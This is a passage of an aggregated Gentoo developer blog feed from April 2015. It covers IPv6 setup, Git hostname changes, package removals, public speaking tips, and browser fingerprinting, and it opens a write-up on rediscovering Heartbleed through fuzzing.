What DHCPv6 in this configuration does not give you is routing — which kinda make sense, as you can use RA (Route Advertisement) for it. Unfortunately at first I could not get it to work. Turns out that, since I use subnets for the containerized network, I enabled IPv6 forwarding, through Puppet of course. Turns out that Linux will ignore Route Advertisement packets when forwarding IPv6 unless you ask it nicely to — by setting accept_ra=2 as well. Yey!

Again this is the kind of problems that finding this information took much longer than it should have been; Linux does not really tell you that it's ignoring RA packets, and it is by far not obvious that setting one sysctl will disable another — unless you go and look for it.

Luckily this was the last problem I had, after that the server was set up fine and I just had to finish configuring the domain's zone file, and the reverse DNS and the SPF records… yes this is all the kind of trouble you go through if you don't just run your whole infrastructure, or use fully cloud — which is why I don't consider self-hosting a general solution.

What remained is just bits and pieces. The first was me realizing that Puppet does not remove the entries from /etc/fstab by default, so I noticed that the Gentoo default /etc/fstab file still contains the entries for CD-ROM drives as well as /dev/fd0. I don't remember which was the last computer with a floppy disk drive that I used, let alone owned.

The other fun bit has been setting up the containers themselves — similarly to the server itself, they are set up with Puppet. Since the server used to be running a tinderbox, it used to also host a proper rsync mirror, it was just easier, but I didn't want to repeat that here, and since I was unable to find a good mirror through mirrorselect (longer story), I configured Puppet to just provide to all the containers with distfiles.gentoo.org as their sync server, which did not work. Turns out that our default mirror address does not have any IPv6 hosts on it ­– when I asked Robin about it, it seems like we just don't have any IPv6-hosted mirror that can handle that traffic, it is sad.

So anyway, I now have a new devbox and I'm trying to set up the rest of my repositories and access (I have not set up access to Gentoo's repositories yet which is kind of the point here.) Hopefully this will also lead to more technical blogging in the next few weeks as I'm cutting down on the overwork to relax a bit.

Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into an example of a web application vulnerable to Apache AddHandler/AddType misconfiguration by chance today.

The releases notes of Magento Community Edition 1.9.1 point to a remote code execution vulnerability.
Interestingly, the section Determining Your Vulnerability to the File System Attack is precisely a switch from AddHandler to SetHandler.

Fantastic! Let’s see if I can use that to convince web hoster X that is still arguing that use of AddHandler would be good enough.

PS: Before anyone takes this for advice to switch to vanilla 1.9.1.0, be sure to apply post-release easy-to-overlook patch “SUPEE-5344″, too. Details are up at (German) Magento-Shops stehen Angreifern offen or (English) Analyzing the Magento Vulnerability.

April 25, 2015
Git changes & impact to Overlays hostnames (April 25, 2015, 00:00 UTC)

As previously announced [1] [2], and previously in the discussion of merging Overlays with Gentoo’s primary SCM hosting (CVS+Git): The old overlays hostnames (git.overlays.gentoo.org and overlays.gentoo.org) have now been disabled, as well as non-SSH traffic to git.gentoo.org. This was a deliberate move to seperate anonymous versus authenticated Git traffic, and ensure that anonymous Git traffic can continued to be scaled when we go ahead with switching away from CVS. Anonymous and authenticated Git is now served by seperate systems, and no anonymous Git traffic is permitted to the authenticated Git server.

If you have anonymous Git checkouts from any of the affected hostnames, you should switch them to using one of these new URLs:

  • https://anongit.gentoo.org/git/$REPO
  • http://anongit.gentoo.org/git/$REPO
  • git://anongit.gentoo.org/$REPO

If you have authenticated Git checkouts from the same hosts, you should switch them to this new URL:

  • git+ssh://git@git.gentoo.org/$REPO

In either case, you can trivially update any existing checkout with:
git remote set-url origin git+ssh://git@git.gentoo.org/$REPO
(be sure to adjust the path of the repository and the name of the remote as needed).

April 23, 2015
Denis Dupeyron a.k.a. calchan (homepage, bugs)

is 46.

In a previous post I described how to patch QEMU to allow building binutils in a cross chroot. In there I increased the maximal number of argument pages to 64 because I was just after a quick fix. Today I finally bisected that, and the result is you need at least 46 for MAX_ARG_PAGES in order for binutils to build.

In bug 533882 it is discussed that LibreOffice requires an even larger number of pages. It is possible other packages also require such a large limit. Note that it may not be a good idea to increase the MAX_ARG_PAGES limit to an absurdly high number and leave it at that. A large amount of memory will be allocated in the target’s memory space and that may be a problem.

Hopefully QEMU switches to a dynamic limit someday like the kernel. In the meantime, my upcoming crossroot tool will offer a way to more easily deal with that.

April 21, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

The weekend of Saturday, April 11, my best friend and I made the drive down to Huntsville, Alabama to participate in the 2015 Superheroes Race benefiting the outstanding organisation that is The National Children’s Advocacy Center. It was a bit of a drive, but almost completely motorway, so it wasn’t that bad. Before talking about the main event (the race itself), I have to mention some of the way cool things that we did beforehand.


NASA US Space and Rocket Center in Huntsville, AL
NASA US Space and Rocket Center in Huntsville, AL
(click to enlarge)

Firstly, we went to the US Space and Rocket Center, which is essentially the visitor’s centre for NASA. In my opinion, the price of admission was a little high, but the exhibits made it completely worth it. Some of the highlights were the Robot Zoo and the amazing showroom of the Saturn V rocket.


Robot grasshopper at US Space and Rocket Center Robot Zoo   Saturn V rocket at US Space and Rocket Center
(click to enlarge)

Secondly, we had some great food at two very different types of restaurants. The first place was for a quick lunch at a Mexican place called Taqueria El Cazador #2, which is housed inside of a bus. We both had the tacos, which were excellent. I also grabbed some tamales, but they didn’t impress me nearly as much as the tacos. Overall, though, a great place that is cheap and tasty! The place that we went for dinner was Phuket Thai Restaurant, and even though it wasn’t in a bus, it was outstanding! Having been to Thailand, I was a little suspicious of the reviewers saying that it was one of the best places for Thai in the US. Having not eaten at all the Thai places in the US, I can’t say so definitively, but it was great! In particular, the Khao Soi was deliciously creamy, and putting the remaining sauce on some extra rice almost made for another meal in and of itself!

Thirdly, we went to the National Children’s Advocacy Center (NCAC) to see what needed to be done to prepare for the race the next day. I have been a supporter of the organisation for quite some time (you can see more about them via their link in the “Charities I Support” menu at the top of the blog), but I had never seen the facilities. I was stunned at the size of the complex, and even more taken aback at the people who work for the NCAC! They were absolutely outstanding, and after having seen the facilities, I feel even more strongly aligned with their mission statement of “modelling, promoting, and delivering excellence in child abuse response and prevention through service, education, and leadership.”


National Children's Advocacy Center NCAC sign   National Children's Advocacy Center NCAC community services building
(click to enlarge)

Fourthly, we just happened to stumble upon this really neat place known as Lowe Mill, and they were having an art show and free concert. There were various artists ranging from painters, photographers, and musicians, as well as plenty of bakers and confectioners serving up their yummy treats (like a decadent lemon cupcake with cream cheese frosting [I won't say who ate that one...]).

Okay, so now let’s get to the actual reason that I went to Huntsville: to support the NCAC in the 2015 Superheroes Race! There were three options for runners: 1) the timed and competitive 5K; 2) the timed and competitive 1-mile; 3) the 1-mile fun-run for kids (and adults too!). I participated in the 5K, and actually ended up coming in first place. My time wasn’t as good as I would have liked, but the course was a lot of fun! It went winding through the city centre and some very nice suburban areas as well (both starting and ending at the NCAC). There were also awards given out for the costumes (best individual costume, best family costumes, et cetera). I went as The Flash, but dang, it’s difficult to run in a full costume, so I applaud those people that did it! The Chief of Police actually ran in the race, and did so in uniform (belt and all)–now that’s supporting the community!


National Children's Advocacy Center NCAC kids' costumes   National Children's Advocacy Center NCAC family costumes
(click to enlarge)

One of the highlights of the whole trip was getting to meet some of the wonderful people that make the NCAC happen. I was fortunate enough to meet Catherine Courtney (the Director of Development) and Caroline Nelson (the Development Campaign Coordinator) (both pictured below), as well as Chris Newlin (the Executive Director). These three individuals are not only a few of the folks that help the NCAC function on a day-to-day basis, but they are truly inspirational people who have huge hearts for helping the children to whom the NCAC provides services–their passion to help kids is nearly tangible!


National Children's Advocacy Center NCAC Catherine Courtney and Zach   National Children's Advocacy Center NCAC Caroline Nelson and Zach
LEFT: The Flash (AKA me) and Catherine Courtney        RIGHT: Caroline Nelson
(click to enlarge)

Overall, the trip to Huntsville was both pleasant and productive. I hope that I will be able to participate in the races in the future, and that I will be able to work with the NCAC for years and years to come. If you agree with their Mission Statement, I urge you to become a member of the Protectors’ Circle and support the incredibly important work that they do.

Cheers,
Zach

Donnie Berkholz a.k.a. dberkholz (homepage, bugs)
How to give a great talk, the lazy way (April 21, 2015, 15:42 UTC)

presenter modeGot a talk coming up? Want it to go well? Here’s some starting points.

I give a lot of talks. Often I’m paid to give them, and I regularly get very high ratings or even awards. But every time I listen to people speaking in public for the first time, or maybe the first few times, I think of some very easy ways for them to vastly improve their talks.

Here, I wanted to share my top tips to make your life (and, selfishly, my life watching your talks) much better:

  1. Presenter mode is the greatest invention ever. Use it. If you ignore or forget everything else in this post, remember the rainbows and unicorns of presenter mode. This magical invention keeps the current slide showing on the projector while your laptop shows something different — the current slide, a small image of the next slide, and your slide notes. The last bit is the key. What I put on my notes is the main points of the current slide, followed by my transition to the next slide. Presentations look a lot more natural when you say the transition before you move to the next slide rather than after. More than anything else, presenter mode dramatically cut down on my prep time, because suddenly I no longer had to rehearse. I had seamless, invisible crib notes while I was up on stage.
  2. Plan your intro. Starting strong goes a long way, as it turns out that making a good first impression actually matters. It’s time very well spent to literally script your first few sentences. It helps you get the flow going and get comfortable, so you can really focus on what you’re saying instead of how nervous you are. Avoid jokes unless most of your friends think you’re funny almost all the time. (Hint: they don’t, and you aren’t.)
  3. No bullet points. Ever. (Unless you’re an expert, and you probably aren’t.) We’ve been trained by too many years of boring, sleep-inducing PowerPoint presentations that bullet points equal naptime. Remember presenter mode? Put the bullet points in the slide notes that only you see. If for some reason you think you’re the sole exception to this, at a minimum use visual advances/transitions. (And the only good transition is an instant appear. None of that fading crap.) That makes each point appear on-demand rather than all of them showing up at once.
  4. Avoid text-filled slides. When you put a bunch of text in slides, people inevitably read it. And they read it at a different pace than you’re reading it. Because you probably are reading it, which is incredibly boring to listen to. The two different paces mean they can’t really focus on either the words on the slide or the words coming out of your mouth, and your attendees consequently leave having learned less than either of those options alone would’ve left them with.
  5. Use lots of really large images. Each slide should be a single concept with very little text, and images are a good way to force yourself to do so. Unless there’s a very good reason, your images should be full-bleed. That means they go past the edges of the slide on all sides. My favorite place to find images is a Flickr advanced search for Creative Commons licenses. Google also has this capability within Search Tools. Sometimes images are code samples, and that’s fine as long as you remember to illustrate only one concept — highlight the important part.
  6. Look natural. Get out from behind the podium, so you don’t look like a statue or give the classic podium death-grip (one hand on each side). You’ll want to pick up a wireless slide advancer and make sure you have a wireless lavalier mic, so you can wander around the stage. Remember to work your way back regularly to check on your slide notes, unless you’re fortunate enough to have them on extra monitors around the stage. Talk to a few people in the audience beforehand, if possible, to get yourself comfortable and get a few anecdotes of why people are there and what their background is.
  7. Don’t go over time. You can go under, even a lot under, and that’s OK. One of the best talks I ever gave took 22 minutes of a 45-minute slot, and the rest filled up with Q&A. Nobody’s going to mind at all if you use up 30 minutes of that slot, but cutting into their bathroom or coffee break, on the other hand, is incredibly disrespectful to every attendee. This is what watches, and the timer in presenter mode, and clocks, are for. If you don’t have any of those, ask a friend or make a new friend in the front row.
  8. You’re the centerpiece. The slides are a prop. If people are always looking at the slides rather than you, chances are you’ve made a mistake. Remember, the focus should be on you, the speaker. If they’re only watching the slides, why didn’t you just post a link to Slideshare or Speakerdeck and call it a day?

I’ve given enough talks that I have a good feel on how long my slides will take, and I’m able to adjust on the fly. But if you aren’t sure of that, it might make sense to rehearse. I generally don’t rehearse, because after all, this is the lazy way.

If you can manage to do those 8 things, you’ve already come a long way. Good luck!


Tagged: communication, gentoo

April 19, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Ich bin ehrlich gesagt irritiert, dass wir diese dumme Idee schon wieder aufgekommen ist.

Bitte mit-unterschreiben

https://www.change.org/p/heiko-maas-bundesregierung-stoppen-sie-die-vorratsdatenspeicherung-vds

und weiter verteilen. Danke!

April 16, 2015
Bernard Cafarelli a.k.a. voyageur (homepage, bugs)
Removing old NX packages from tree (April 16, 2015, 21:30 UTC)

I already sent the last rites announce a few days ago, but here is a more detailed post on the coming up removal of “old” NX packages. Long story short: migrate to X2Go if possible, or use the NX overlay (“best-effort” support provided).
2015/04/26 note: treecleaning done!

Affected packages

Basically, all NX clients and servers except x2go and nxplayer! Here is the complete list with some specific last rites reasons:

  • net-misc/nxclient,net-misc/nxnode,net-misc/nxserver-freeedition: binary-only original NX client and server. Upstream has moved on to a closed-source technology, and this version  bundles potientally vulnerable binary code. It does not work as well as before with current libraries (like Cairo).
  • net-misc/nxserver-freenx, net-misc/nxsadmin: the first open-source alternative server. It could be tricky to get working, and is not updated anymore (last upstream activity around 2009)
  • net-misc/nxcl, net-misc/qtnx: an open-source alternative client (last upstream activity around 2008)
  • net-misc/neatx: Google’s take on a NX server, sadly it never took off (last upstream activity around 2010)
  • app-admin/eselect-nxserver (an eselect module to switch active NX server, useless without these servers in tree)

Continue using these packages on Gentoo

These packages will be dropped from the main tree by the end of this month (2015/04), and then only available in the NX overlay. They will still be supported there in a “best effort” way (no guarantee how long some of these packages will work with current systems).

So, if one of these packages still works better for you, or you need to keep them around before migrating, just run:

# layman -a nx

Alternatives

While it is not a direct drop-in replacement, x2go is the most complete solution currently in Gentoo tree (and my recommendation), with a lot of possible advanced features, active upstream development, … You can connect to net-misc/x2goserver with net-misc/x2goclient, net-misc/pyhoca-gui, or net-misc/pyhoca-cli.

If you want to try NoMachine’s (the company that created NX) new system, well the client is available in Portage as net-misc/nxplayer. The server itself is not packaged yet, if you are interested in it, this is bug #488334

April 13, 2015
Bernard Cafarelli a.k.a. voyageur (homepage, bugs)

This blog was hosted by GandiBlog since mid-2006. Thanks to the Gandi folks, it has served me well, though it was starting to show its age.

Now I intend to revive this blog, and the first step was to finally move it on my server, switching to WordPress in the process! The rest of this post will detail how I did the switch, keeping the blog content and links.

GandiBlog to self-hosted Dotclear2

GandiBlog’s only export possibility is via a flat text file export (Extensions->Import/Export). An old WordPress plugin exists to import such files, and will likely be the solution you will first find in your favourite search engine. But its last update was some years ago and it does not seem to work with current versions. Instead, I chose to set up a temporary DotClear2 installation on my server, to use the current import plugin in WordPress later.

Installing DotClear is as easy as creating a mysql user/db, unpack the latest 2.x tarball, and follow the installation wizard. No need to tweak configuration our users here, I just logged in the administration panel, imported from the GandiBlog flat file, and I was (mostly) done!

I say mostly, because I fixed 2 things before the WordPress jump. You may not need to do the same, but here they are:

  • Some blog posts were in wiki style and not in xhtml, and were not converted correctly. As there were only a few of them, I used the”Convert to XML” button available when editing a post. I think tools exist for a mass conversion
  • Some other posts were in the “Uncategorized” category, and were ignored in the import process. My manual workaround was to set them to a “Other” category I created for the occasion. Again, this can be automated

Dotclear2 to WordPress4

The next step was to set up a new vhost on my server, emerge latest wordpress and install it in this new vhost (no special steps here) .

Once WordPress was basically up and running, I installed the “DotClear2 Importer” plugin, and ran it (it is an additional entry in Tools/Import). Basically it summed up to filling the (dotclear) database connection infos, and hit next button a few times.

Some additional steps to clean the new blog posts:

  • configure the permalink settings to use “Month and name”. This along with the “Permalink Finder” plugin, allowed me to preserve old links to the blog posts (the plugin deduces the new post URL and redirects to it)
  • delete the user created by the import, moving all posts to the new user in WordPress (this is a single-user blog)
  • move back the “Other” category posts to “Uncategorized”
  • temporarily install “Broken Link Checker” plugin to fix some old/dead links. Some comments had an additional “http://” prefix in URLs, and I fixed them along with updating other real links
  • remove temporary parts (dotclear install and database, cleanup/import plugins, …)
  • And when everything looked good, I could update my DNS entries to the blog :)

April 12, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

So Sebastian posted recently about Panopticlick, but I'm afraid he has not grasped just how many subtleties are present when dealing with tracking by User-Agent and with the limitations of the tool as it is.

First of all, let's take a moment to realize what «Your browser fingerprint appears to be unique among the 5,207,918 tested so far.» (emphasis mine) means. If I try the exact same request as Incognito, the message is «Within our dataset of several million visitors, only one in 2,603,994 browsers have the same fingerprint as yours.» (emphasis mine). I'm not sure why EFF does not expose the numbers in the second situation, hiding the five millions under the word "several". I can't tell how they identify further requests on the same browser not to be a new hit altogether. So I'm not sure what the number represents.

Understanding what the number represents is a major problem, too: if you count that even just in his post Sebastian tried at least three browsers; I tried twice just to write this post — so one thing that the number does not count is unique users. I would venture a guess that the number of users is well below the million, and that does count into play for multiple factors. Because Panopticlick was born in 2010, and if less than a million real users hit it, in five years, it might not be that statistically relevant.

Indeed, according to the current reading, just the Accept headers would be enough to boil me down to one in four sessions — that would be encoding and language. I doubt that is so clear-cut, as I'm most definitely not one of four people in the UKIE area speaking Italian. A lot of this has to do with the self-selection of "privacy conscious" people who use this tool from EFF.

But what worries me is the reaction from Sebastian and, even more so, the first comment on his post. Suggesting that you can hide in the crowd by looking for a "more popular" User-Agent or by using a random bunch of extensions and disabling JavaScript or blocking certain domains is naïve to say the least, but most likely missing and misunderstanding the point that Panopticlick tries to make.

The whole idea of browser fingerprinting is the ability to identify an user across a set of sessions — it responds to a similar threat model as Tor. While I already pointed out I disagree on the threat model, I would like to point out again that the kind of "surveillance" that this counters is ideally the one that is executed by an external entity able to monitor your communications from different source connections — if you don't use Tor and you only use a desktop PC from the same connection, then it doesn't really matter: you can just check for the IP address! And if you use different devices, then it also does not really matter, because you're now using different profiles anyway; the power is in the correlation.

In particular, when trying to tweak User-Agent or other headers to make them "more common", you're now dealing with something that is more likely to backfire than not; as my ModSecurity Ruleset shows you very well, it's not so difficult to tell apart a real Chrome request by Firefox masquerading as Chrome, or IE masquerading as Safari, they have different Accept-Encoding, and other differences in style of request headers, making it quite straightforward to check for them. And while you could mix up the Accept headers enough to "look the part" it's more than likely that you'll be served bad data (e.g. sdch to IE, or webp to Firefox) and that would make your browsing useless.

More importantly, the then-unique combination of, say, a Chrome User-Agent for an obviously IE-generated request would make it very obvious to follow a session aggregated across different websites with a similar fingerprint. The answer I got by Sebastian is not good either: even if you tried to use a "more common" version string, you could still, very easily, create unwanted unique fingerprints; take Firefox 37: it started supporting the alt-svc extension to use HTTP2 when available, if you were to report your browser as Firefox 28 and then it followed alt-svc, then it would clearly be a fake version string, and again an easy one to follow. Similar version-dependent request fingerprinting, paired with a modified User-Agent string would make you light up as a Christmas tree during Earth Day.

There are more problems though; the suggestion of installing extensions such as AdBlock also adds to the fingerprinting rather than block from it; as long as JavaScript is allowed to run, it can detect AdBlock presence, and with a bit of work you can identify presence of one out of the set of different blocking lists, too. You could use NoScript to avoid running JavaScript at all, but given this is by far not something most users will do, it'll also add up to the entropy of a fingerprint for your browser, not remove from it, even if it prevents client-side fingerprinting to access things like the list of available plugins (which in my case is not that common, either!)

But even ignoring the fact that Panopticlick does not try to identify the set of installed extensions (finding Chrome's Readability is trivial, as it injects content into the DOM, and so do a lot more), there is one more aspect that it almost entirely ignores: server-side fingerprinting. Beside not trying to correlate the purported User-Agent against the request fingerprint, it does not seem to use a custom server at all, so it does not leverage TLS handshake fingerprints! As can be seen through Qualys analysis, there are some almost-unique handshake sequences on a given server depending on the client used; while this does not add up much more data when matched against a vanilla User-Agent, a faked User-Agent and a somewhat more rare TLS handshake would be just as easy to track.

Finally, there is the problem with self-selection: Sebastian has blogged about this while using Firefox 37.0.1 which was just released, and testing with that; I assume he also had the latest Chrome. While Mozilla increased the rate of release of Firefox, Chrome has definitely a very hectic one with many people updating all the time. Most people wouldn't go to Panopticlick every time they update their browser, so two entries that are exactly the same apart from the User-Agent version would be reported as unique… even though it's most likely that the person who tried two months ago updated since, and now has the same fingerprint as the person who tried recently with the same browser and settings.

Now this is a double-edged sword: if you rely on the User-Agent to track someone across connections, a ephemeral User-Agent that changes every other day due to updates is going to disrupt your plans quickly; on the other hand lagging behind or jumping ahead on the update train for a browser would make it more likely for you to have a quite unique version number, even more so if you're tracking beta or developer channels.

Interestingly, though, Mozilla has thought about this before, and their Gecko user agent string reference shows which restricted fields are used, and references the bugs that disallowed extensions and various software to inject into the User-Agent string — funnily enough I know of quite a few badware cases in which a unique identifier was injected into the User-Agent for fake ads and other similar websites to recognize a "referral".

Indeed, especially on Mobile, I think that User-Agents are a bit too liberal with the information they push; not only they include the full build number of the mobile browser such as Chrome, but they usually include the model of the device and the build number of the operating system: do you want to figure out if a new build of Android is available for some random device out there? Make sure you have access to HTTP logs for big enough websites and look for new build IDs. I think that in this particular sub-topic, Chrome and Safari could help a lot more by reducing the amount of details of the engine version as well as the underlying operating system.

So, for my parting words, I would like to point out that Panopticlick is a nice proof-of-concept that shows how powerful browser fingerprinting is, without having to rely on tracking cookies. I think lots of people both underestimate the power of fingerprinting and overestimate the threat. From one side, because Panopticlick does not have enough current data to make it feasible to evaluate the current uniqueness of a session across the world; from the other, because you get the wrong impression that if Panopticlick can't put you down as unique, you're safe — you're not, there are many more techniques that Panopticlick does not think of trying!

My personal advice is to stop worrying about the NSA and instead start safekeeping yourself: using click-to-play for Flash and Java is good prophylaxis for security, not just privacy, and NoScript can be useful too, in some cases, but don't just kill everything on sight. Even using the Data Saver extension for non-HTTPS websites can help (unfortunately I know of more than a few blocking it, and then there is the problem with captive portals bringing it to be clear-text HTTP too.)

April 11, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Firefox: You may want to update to 37.0.1 (April 11, 2015, 19:23 UTC)

I was pointed to this Mozilla Security Advisory:

Certificate verification bypass through the HTTP/2 Alt-Svc header
https://www.mozilla.org/en-US/security/advisories/mfsa2015-44/

While it doesn’t say if all versions prior to 37.0.1 are affected, it does say that sending a certain server response header disabled warnings of invalid SSL certificates for that domain. Ooops.

I’m not sure how relevant HTTP/2 is by now.

Paweł Hajdan, Jr. a.k.a. phajdan.jr (homepage, bugs)

Slot conflicts can be annoying. It's worse when an attempt to fix them leads to an even bigger mess. I hope this post helps you with some cases - and that portage will keep getting smarter about resolving them automatically.

Read more »

Sebastian Pipping a.k.a. sping (homepage, bugs)

A document that I was privileged to access pre-release snapshots of has now been published:

Introduction to Chinese Chess (XiangQi) for International Chess Players
A Comparison of Chess and XiangQi
By xq_info (add) gmx.de (a bit shy about his real name)
98 pages

You may like the self-assessment puzzles aspect about it, but not only that. Recommended!

It’s up here:

http://wxf.ca/wxf/doc/book/xiangqi_introduction_chessplayers_20150323.pdf

Best, Sebastian

While https://panopticlick.eff.org/ is not really new, I learned about that site only recently.
And while I knew that browser self-identification would reduce my anonymity on the Internet, I didn’t expect this result:

Your browser fingerprint appears to be unique among the 5,198,585 tested so far.

Wow. Why? Let’s try one of the others browsers I use. “Appears to be unique”, again (where Flash is enabled).

What’s so unique about my setup? The two reports say about my setup:

Characteristic One in x browsers have this value
Browser Firefox
36.0.1
Google Chrome
42.0.2311.68
Chromium
41.0.2272.76
User Agent 2,030.70 472,599.36 16,576.56
HTTP_ACCEPT Headers 12.66 5477.97 5,477.97
Browser Plugin Details 577,620.56 259,929.65 7,351.75
Time Zone 6.51 6.51 6.51
Screen Size and Color Depth 13.72 13.72 13.72
System Fonts 5,198,585.00 5,198,585.00 5.10
(Flash and Java disabled)
Are Cookies Enabled? 1.35 1.35 1.35
Limited supercookie test 1.83 1.83 1.83

User agent and browser plug-ins hurt, fonts alone kill me altogether. Ouch.

Update:

  • It’s the very same when browsing with an incognito window. Re-reading, what that feature is officially intended to do (being incognito to your own history), that stops being a surprise.
  • Chromium (with Flash/Java disabled) added

Thoughts on fixing this issue:

I’m not sure about how I want to fix this myself. Faking popular values (in a popular combination to not fire back) could work using a local proxy, a browser patch, a browser plug-in maybe. Obtaining true popular value combinations is another question. Fake values can reduce the quality of the content I am presented, e.g. I would not fake my screen resolution or be sure to not deviate by much, probably.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Almost quiet dataloss (April 11, 2015, 11:06 UTC)

Some harddisk manufacturers have interesting ideas ... using some old Samsung disks in a RAID5 config:

[15343.451517] ata3.00: exception Emask 0x0 SAct 0x40008410 SErr 0x0 action 0x6 frozen
[15343.451522] ata3.00: failed command: WRITE FPDMA QUEUED
[15343.451527] ata3.00: cmd 61/20:20:d8:7d:6c/01:00:07:00:00/40 tag 4 ncq 147456 out
                        res 40/00:00:00:4f:c2/00:00:00:00:00/00 Emask 0x4 (timeout)                                                                                                                                                                                            
[15343.451530] ata3.00: status: { DRDY }
[15343.451532] ata3.00: failed command: WRITE FPDMA QUEUED
[15343.451536] ata3.00: cmd 61/30:50:d0:2f:40/00:00:0d:00:00/40 tag 10 ncq 24576 out
                        res 40/00:ff:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout)                                                                                                                                                                                            
[15343.451538] ata3.00: status: { DRDY }
[15343.451540] ata3.00: failed command: WRITE FPDMA QUEUED
[15343.451544] ata3.00: cmd 61/a8:78:90:be:da/00:00:0b:00:00/40 tag 15 ncq 86016 out
                        res 40/00:ff:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout)                                                                                                                                                                                            
[15343.451546] ata3.00: status: { DRDY }
[15343.451549] ata3.00: failed command: READ FPDMA QUEUED
[15343.451552] ata3.00: cmd 60/38:f0:c0:2b:d6/00:00:0e:00:00/40 tag 30 ncq 28672 in
                        res 40/00:00:00:4f:c2/00:00:00:00:00/00 Emask 0x4 (timeout)                                                                                                                                                                                            
[15343.451555] ata3.00: status: { DRDY }
[15343.451557] ata3: hard resetting link
[15343.911891] ata3: SATA link up 3.0 Gbps (SStatus 123 SControl 300)
[15344.062112] ata3.00: configured for UDMA/133
[15344.062130] ata3.00: device reported invalid CHS sector 0
[15344.062139] ata3.00: device reported invalid CHS sector 0
[15344.062146] ata3.00: device reported invalid CHS sector 0
[15344.062153] ata3.00: device reported invalid CHS sector 0
[15344.062169] ata3: EH complete
Hmm, that doesn't look too good ... but mdadm still believes the RAID is functional.

And a while later things like this happen:
[ 2968.701999] XFS (md4): Metadata corruption detected at xfs_dir3_data_read_verify+0x72/0x77 [xfs], block 0x36900a0
[ 2968.702004] XFS (md4): Unmount and run xfs_repair
[ 2968.702007] XFS (md4): First 64 bytes of corrupted metadata buffer:
[ 2968.702011] ffff8802ab5cf000: 04 00 00 00 99 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702015] ffff8802ab5cf010: 03 00 00 00 00 00 00 00 02 00 00 00 9e 00 00 00  ................
[ 2968.702018] ffff8802ab5cf020: 0c 00 00 00 00 00 00 00 13 00 00 00 00 00 00 00  ................
[ 2968.702021] ffff8802ab5cf030: 04 00 00 00 82 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702048] XFS (md4): metadata I/O error: block 0x36900a0 ("xfs_trans_read_buf_map") error 117 numblks 8
[ 2968.702476] XFS (md4): Metadata corruption detected at xfs_dir3_data_reada_verify+0x69/0x6d [xfs], block 0x36900a0
[ 2968.702491] XFS (md4): Unmount and run xfs_repair
[ 2968.702494] XFS (md4): First 64 bytes of corrupted metadata buffer:
[ 2968.702498] ffff8802ab5cf000: 04 00 00 00 99 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702501] ffff8802ab5cf010: 03 00 00 00 00 00 00 00 02 00 00 00 9e 00 00 00  ................
[ 2968.702505] ffff8802ab5cf020: 0c 00 00 00 00 00 00 00 13 00 00 00 00 00 00 00  ................
[ 2968.702508] ffff8802ab5cf030: 04 00 00 00 82 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702825] XFS (md4): Metadata corruption detected at xfs_dir3_data_read_verify+0x72/0x77 [xfs], block 0x36900a0
[ 2968.702831] XFS (md4): Unmount and run xfs_repair
[ 2968.702834] XFS (md4): First 64 bytes of corrupted metadata buffer:
[ 2968.702839] ffff8802ab5cf000: 04 00 00 00 99 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702842] ffff8802ab5cf010: 03 00 00 00 00 00 00 00 02 00 00 00 9e 00 00 00  ................
[ 2968.702866] ffff8802ab5cf020: 0c 00 00 00 00 00 00 00 13 00 00 00 00 00 00 00  ................
[ 2968.702871] ffff8802ab5cf030: 04 00 00 00 82 00 00 00 fc ff ff ff ff ff ff ff  ................
[ 2968.702888] XFS (md4): metadata I/O error: block 0x36900a0 ("xfs_trans_read_buf_map") error 117 numblks 8
fsck finds quite a lot of data not being where it should be.
I'm not sure who to blame here - the kernel should actively punch out any harddisk that is fish-on-land flopping around like that, the md layer should hate on any device that even looks weirdly, but somehow "just doing a link reset" is considered enough.

I'm not really upset that an old cheap disk that is now ~9 years old decides to have dementia, but I'm quite unhappy with the firmware programming that doesn't seem to consider data loss as a problem ... (but at least it's not Seagate!)

April 08, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Zitat: “Mit dieser Petition fordern wir ein generelles und ausnahmsloses Fracking-Verbot für Kohlenwasserstoffe in Deutschland!”

https://www.change.org/p/bundestag-fracking-gesetzlich-verbieten-ausgfrackt-is

April 07, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)
How Heartbleed could've been found (April 07, 2015, 13:23 UTC)

Heartbleedtl;dr With a reasonably simple fuzzing setup I was able to rediscover the Heartbleed bug. This uses state-of-the-art fuzzing and memory protection technology (american fuzzy lop and Address Sanitizer), but it doesn't require any prior knowledge about specifics of the Heartbleed bug or the TLS Heartbeat extension. We can learn from this to find similar bugs in the future.

Exactly one year ago a bug in the OpenSSL library became public that is one of the most well-known security bug of all time: Heartbleed. It is a bug in the code of a TLS extension that up until then was rarely known by anybody. A read buffer overflow allowed an attacker to extract parts of the memory of every server using OpenSSL.

Can we find Heartbleed with fuzzing?

Heartbleed was introduced in OpenSSL 1.0.1, which was released in March 2012, two years earlier. Many people wondered how it could've been hidden there for so long. David A. Wheeler wrote an essay discussing how fuzzing and memory protection technologies could've detected Heartbleed. It covers many aspects in detail, but in the end he only offers speculation on whether or not fuzzing would have found Heartbleed. So I wanted to try it out.

Of course it is easy to find a bug if you know what you're looking for. As best as reasonably possible I tried not to use any specific information I had about Heartbleed. I created a setup that's reasonably simple and similar to what someone would also try it without knowing anything about the specifics of Heartbleed.

Heartbleed is a read buffer overflow. What that means is that an application is reading outside the boundaries of a buffer. For example, imagine an application has a space in memory that's 10 bytes long. If the software tries to read 20 bytes from that buffer, you have a read buffer overflow. It will read whatever is in the memory located after the 10 bytes. These bugs are fairly common and the basic concept of exploiting buffer overflows is pretty old. Just to give you an idea how old: Recently the Chaos Computer Club celebrated the 30th anniversary of a hack of the German BtX-System, an early online service. They used a buffer overflow that was in many aspects very similar to the Heartbleed bug. (It is actually disputed if this is really what happened, but it seems reasonably plausible to me.)

